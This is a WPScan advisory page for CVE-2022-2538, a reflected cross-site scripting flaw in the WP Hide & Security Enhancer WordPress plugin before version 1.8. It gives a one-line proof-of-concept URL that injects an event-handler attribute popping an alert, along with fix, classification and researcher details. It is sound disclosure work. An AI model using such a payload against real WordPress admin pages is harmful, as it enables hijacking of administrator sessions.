WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Hide & Security Enhancer < 1.8 - Reflected Cross-Site Scripting

Description

The plugin does not escape a parameter before outputting it back in an attribute of a backend page, leading to a Reflected Cross-Site Scripting

Proof of Concept

http://example.com/wp-admin/admin.php?page=wp-hide-cdn&component=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x

Affects Plugins

wp-hide-security-enhancer
Fixed in version 1.8

References

CVE
CVE-2022-2538

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Submitter twitter
kazet1234
Verified

Yes

WPVDB ID
afa1e159-30bc-42d2-b3f8-8c868b113d3e

Timeline

Publicly Published

2022-08-08 (about 7 months ago)

Added

2022-08-08 (about 7 months ago)

Last Updated

2022-08-08 (about 7 months ago)

Our Other Services

WPScan WordPress Security Plugin